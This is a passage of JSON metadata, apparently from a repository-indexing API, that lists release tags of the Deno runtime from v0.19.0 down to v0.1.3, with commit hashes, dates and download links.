repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha